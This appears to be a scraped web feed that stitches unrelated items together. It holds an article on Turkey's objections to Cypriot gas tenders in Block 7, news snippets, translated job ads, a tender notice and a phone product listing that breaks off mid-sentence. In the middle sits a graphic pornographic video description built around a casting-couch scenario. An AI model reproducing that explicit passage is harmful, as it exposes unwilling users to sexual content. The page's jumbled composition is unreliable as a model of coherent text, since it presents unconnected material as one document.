    Turkey recognizes neither Cyprus’s maritime borders nor the agreements on its exclusive economic zones. Nicosia manages the gas exploration in the waters it considers its own. This leads to a conflict on which the Gefira Team reports regularly. In February we described the complex situation in connection with the gas blocks around Cyprus.

    Then the Turkish navy stopped the exploration ship of Italian Eni from entering Cyprus’ territorial waters by threatening to sink it. In response, Rome sent its own ships to the region.

    So far, the dispute concerned the southern and eastern basin around Cyprus. Last week Nicosia invited tenders for gas exploration in Block 7, which could be another casus belli, because Blocks 1, 4, 5, 6 and 7 are crossed by the Turkish-Egyptian border, recognized by Turkey. Cyprus, however, in 2003 concluded an agreement with Egypt regarding the Exclusive Economic Zone (EEZ), which Ankara does not honour.

    The Turkish government is of the opinion that both the Turkish authorities and North Nicosia (the capital of Northern Cyprus) have the right to decide on the exploitation of these sectors.

    Turkey’s Ministry of Foreign Affairs issued a statement, in which it says that:

    1. mining in Block 7 cannot take place without Turkey’s consent due to the sea border passing there;

    2. Cypriot Turks are co-owners of the island and hence of its natural resources at the bottom of territorial waters;

    3. unilateral invitation of tenders by Nicosia violates the interests of Northern Cyprus and Turkey;

    4. Ankara will take steps to protect its rights and those of Turkish Cypriots, including the blocking of third parties’ exploration.

    We expect that if the Turkish Navy again blocks the exploration vessel of the Italian Eni, or the French TOTAL, or the American Exxon-Mobil (these companies were invited to take part in the tender), the reaction of the governments of the respective countries will be stronger than it was in February.


              10/10/2018: CANADA: Notley, Kenney clash over Odin photos

    EDMONTON • Alberta Premier Rachel Notley says Opposition Leader Jason Kenney must stop “dog-whistle” politics that allow hateful extremists to believe they have a home in his United Conservative Party. But Kenney is accusing Notley of exploiting a...
              Prat-Bonrepaux. Noémie and Djem du Castéras, champions of France
    The Grande Semaine de Pompadour has just crowned a young pony born, bred and trained in Occitanie, in Ariège, and more precisely at the foot of the château of Prat-Bonrepaux. At this event, which every year brings together the general public and riding enthusiasts (the third-largest sports federation and the leading women's sport by number of licence holders), "Djem du Castéras" and Noémie Bosc repeated last year's feat, winning a...
              TRANSPORT AND LOGISTICS SITE MANAGER (M/F)
    You are responsible for the management, coordination and control of the organisation of the site's activities, within a budget validated by Management. You guarantee the smooth running of operations in terms of quality, safety, cost control and team productivity. You manage and lead the staff (10 people) and the transport subcontractors. Your main duties: - manage inbound and outbound flows in compliance with processes: receiving, automated sorting, picking, dock preparation, delivery (with strong seasonality) - meet targets for quality of service, customer satisfaction, productivity and safety - lead, coordinate, monitor and control the activity of the transport subcontractors responsible for distribution - manage the site's HR aspects: recruitment, personnel administration, management of temporary staff... - analyse and control operational quality of service, put improvement actions in place - monitor the annual budget and report regularly - guarantee proper application of employment law and of the safety and security policy
              Branch Manager (M/F) - 59
    Reporting directly to the subsidiary's Regional Director, you will be responsible for the smooth running of your branch. Truly at the head of your own profit centre, you will independently manage human and material resources and develop commercial activity. To achieve this, your duties as Branch Manager will be as follows: - Set up and drive the group's commercial strategy to achieve commercial objectives - Prospect for and develop customers in your area. - Manage and coach a team of around a dozen employees - Supervise training - Identify and set objectives - Define investment and operating budgets - Put in place actions to achieve an operating result in line with the objectives set beforehand.
              Branch Manager (M/F) - 94
    Reporting directly to the subsidiary's Regional Director, you will be responsible for the smooth running of your branch. Truly at the head of your own profit centre, you will independently manage human and material resources and develop commercial activity. To achieve this, your duties as Branch Manager will be as follows: - Set up and drive the group's commercial strategy to achieve commercial objectives - Prospect for and develop customers in your area. - Manage and coach a team of 10 employees - Supervise training - Identify and set objectives - Define investment and operating budgets - Put in place actions to achieve an operating result in line with the objectives set beforehand.
              Accounting Interfaces Analyst/Designer (M/F)
    Within the Group IT department (DSIU) "Business Technology", in the Finance, accounting and financial software application domain, you will work operationally on all accounting interface processes (including the AI Suite accounting interpreter published by AXWAY) to ensure their monitoring and their maintenance and evolution, within the framework of the IT department's quality system (ISO 9001). The accounting interfaces transform the business events of the various applications of the Coface information system (billing, litigation, reinsurance, treasury, payroll, etc.) into accounting entries for integration into the subsidiary ledger modules (customers and suppliers) and the general ledger of the Coface accounting system (ERP), for Coface itself and for several group entities. For some flows, the production of accounting entries is accompanied by the generation of the associated accounting documents sent to third parties. All of these processes are batch jobs. Under the coordination of the head of the Accounting Interfaces activity, you will be in charge of operations monitoring and of maintenance and evolution actions from the design phase through to production release, and you will be directly involved in requirements gathering, functional and technical specifications, build (programming and configuration), integration, qualification, acceptance-testing support and production release. As part of the roll-out of new versions, you will take part in organising the operations with the various stakeholders, carry out first-level tests and assist the user departments during acceptance phases. You will be in constant contact with the business owners and with the IT department's Development and Production teams.
              441931-2018: Poland-Olsztyn: Logging services
    Publication date: 10/10/2018 | Deadline: 26-10-2018 | Document: Additional information
              TSPussyHunters.com/Kink.com - Chanel Santini, Dee Williams - Going Down On Hollywood!: Young Starlet Fucks Perverted Casting Director (540p/SD)
    TSPussyHunters.com/Kink.com - Chanel Santini, Dee Williams - Going Down On Hollywood!: Young Starlet Fucks Perverted Casting Director (540p/SD)

    When horny, perverted casting director Dee Williams calls in the next actress auditioning for her next big blockbuster, she’s absolutely giddy to see the gorgeously fuck-able Chanel Santini come sauntering in the door. Exploiting her position of power, Dee demands that Chanel strip down to her lingerie to prove she “really wants the part.” Swooping in to make a move on the stunning actress, Dee grabs at Chanel’s tits, rubbing herself and licking her lips as Miss Santini tries to read her lines. As Dee pushes Chanel’s boundaries further and further - kissing and licking at her pert nipples - Santini whips her hand up to Dee’s throat, giving this Hollywood exec what she deserves! “You’re going to ruin my career, aren’t you?!” Dee moans. With another deep kiss, Chanel whispers, “Absolutely….” Using Dee’s flexible, taut, and hungry body for her pleasure, Chanel fucks Dirty Director Williams in every position the casting couch allows! Forward, backward, and sideways, Chanel shoves her long, thick cock into Dee’s wet, desiring pussy and mouth while Dee cums over and over again, finally squirting all over Miss Santini’s hard dick before it’s shoved back inside her hole for another round. Before flipping Miss Williams over to explore her tight pink asshole, Chanel is serviced by Dee’s feet - her toes spreading and clenching as they slide up and down Chanel’s glistening cock. Thoroughly turned on, Chanel wants to make full use of this perverted whore, shoving her dick deep into Dee as she moans in pleasure. Doggy, missionary, cowgirl - this pair does it all with an undeniable chemistry until Dee’s tight asshole gapes from Chanel’s use and Chanel squirts her load high on to Dee’s dripping cunt. With lots of deep kissing, squirting, tons of cock sucking, foot worship, and intense anal, this casting couch isn’t one to miss! Will Chanel take Hollywood down?! Not before she makes Hollywood go down on her!


              Calls for legal migrant prostitution after research finds some exploited | Stuff.co.nz


              IT Intern – mining technologies - Rio Tinto - Havre-Saint-Pierre, QC
    They are found everywhere, from smartphones to planes and cars, by way of hospitals and homes....
    From Rio Tinto - Sat, 22 Sep 2018 11:00:13 GMT
              Crosscall Trekker-X4 Smartphone, Dual SIM, 64 GB, Black

    699€



    4G smartphone, GPS function, A-GPS, GLONASS, BeiDou and Galileo support, Operating system: Android 8.1.0 Oreo, Front camera: 8 MP, Bluetooth 5.0 LE, WiFi IEEE 802.11 b/g/n/ac, WiFi Direct, HotSpot, NFC, FM radio, Dual Nano SIM

    TREKKER-X4
    CREATE YOUR LIFE STORY

    1 LIVE INTENSELY

    2 CAPTURE CREATIVELY

    3 EDIT EASILY

    4 SHARE INSTANTLY

    CAPTURE AND SHARE YOUR OUTDOOR EXPERIENCES, THE WAY YOU LIVE THEM, THE WAY YOU FEEL THEM!

    Simple to use, fluid and intuitive, the TREKKER-X4 is probably the first phone in the world to have been designed around video while optimizing the brand's key promises: it is the toughest in the range, the most waterproof and the best suited to the outdoor world. But the TREKKER-X4's real feat is undoubtedly to bring together the best of action cams in an optimized design only 12.8 mm thick. Enjoy an unparalleled video experience, share it and let your loved ones relive the intensity of your outings.

    PANOMORPH TECHNOLOGY

    TO CORRECT DISTORTION

    Several angles of view: 88°, 110°, 140°, 170° | Stabilization | Hyperstabilization: horizontal locking of the shot that compensates for the phone's movements.

    X-CAM

    AN ALL-IN-ONE VIDEO EXPERIENCE

    Native app (designed and developed by Crosscall) dedicated to video capture, editing and assembly.
    For intuitive, immediate use.

    OUTDOOR

    NO COMPROMISE ON THE CROSSCALL DNA

    Proven resistance in outdoor environments | 2-metre drop test | Military standard, 12 tests (MIL-STD-810G) | IP68 (2 metres, 1 h) | Flash 2x0.5W | Gorilla Glass 5

    X-LINK

    MOUNTING / CHARGING AND DATA TRANSFER

    Intelligent magnetic connection system for pairing the TREKKER-X4 with a wide range of accessories. | Mounting reinforced by the X-BLOCKER, a unique securing part.

    12MP PHOTOS

    OPTIMIZED PHOTO QUALITY

    2 independent sensors, 88°/170°, to cover every use | Hybrid autofocus: PDAF (best in bright light) + laser (best in low light)

    PANOMORPH TECHNOLOGY

    An innovative and disruptive technology

    Panomorph technology consists of projecting reality onto a half sphere and then using software processing to reconstruct the image (through dewarping), keeping the angle of view while correcting distortion. It delivers wide-angle, stabilized images, as close as possible to what the eye perceives, even with very little distance from the subject.
    With Panomorph technology, give your shots a new perspective!

    X-CAM: ALL-IN-ONE VIDEO EXPERIENCE

    LIVE MORE INTENSELY...

    BECAUSE IT IS IDEAL FOR ALL OUTDOOR ACTIVITIES …

    WATERPROOF

    IP68, 2 m 60 min, resistant to salt water | Gore-Tex membrane sealing the speakers and microphones

    RUGGED

    2 m drop test onto concrete (6 faces) | Front AND back glass Gorilla Glass 5, 0.9 mm thick at front, 0.7 mm at back | Mounted on silent blocks | Aluminium side bars | Dual-injection TPU shock absorber | MIL STD 810G across 12 tests

    LONG BATTERY LIFE

    4400 mAh battery | Outdoor power-saving mode for a long, uninterrupted video experience. | QC 3.0 fast charging | Shielded USB-C fast-charge cable

    … AND ITS X-LINK MAGNETIC CONNECTOR LETS YOU PAIR IT WITH A LARGE NUMBER OF ACCESSORIES, SO YOU CAN USE THE PHONE'S VIDEO FUNCTIONS ON ALL YOUR OUTINGS.

    … One-step mounting | data transfer* | Charging*

    Whether you are skiing, paragliding or jet-skiing, take the TREKKER-X4 everywhere with you thanks to its complete range of accessories, then charge it and transfer your memories simply and instinctively. Be sure you can relive each of your best moments on video!

    CAPTURE CREATIVELY

    CROSSCALL INNOVATION

    HYPERSTAB: AN UNSHAKEABLE IMAGE

    In addition to the stabilized mode, the Hyperstab® function lets you shoot videos that keep their horizontal alignment. Analysis of the gyroscope data compensates for the movements and vibrations of the video capture and so removes the smartphone's superfluous movements. It is the only phone that films in 16:9 whatever the smartphone's orientation. Videos are thus stabilized even in the most extreme uses (trail running, mountain biking, skiing...).

    DASHCAM: RECORD YOUR PAST ACTIONS!

    With this option, your smartphone records continuously. Whenever you want, save the last few minutes of footage!

    THE X-CAM'S OTHER PRESET MODES!

    DYNAMIC: to record all outdoor activities in stabilized wide-angle video

    SLOW MOTION: slows the image down by up to 5 times.

    TIME-LAPSE: to build a video from photos taken at regular time intervals

    LIVE STREAMING: to share all the TREKKER-X4's wide-angle videos "LIVE" on social networks

    EDIT EASILY

    Create your video edits (X-STORY) in the blink of an eye. You are free to add effects, transitions, filters and music in an ultra-simple, intuitive way to bring your adventures to life.

    SHARE INSTANTLY

    As soon as your X-STORY is created, share it with your friends and on social networks.
    The TREKKER-X4 also gives you the option of sharing live your

    AND ALSO...

    12MP PHOTO

    Partnerships with image-processing experts (Qualcomm®, Immervision®, MM-Solution®, DxO®) | Dual camera (170° / 88°) | Hybrid autofocus (PDAF + laser)

    SOUND

    Stereo sound with two dedicated speakers with a pow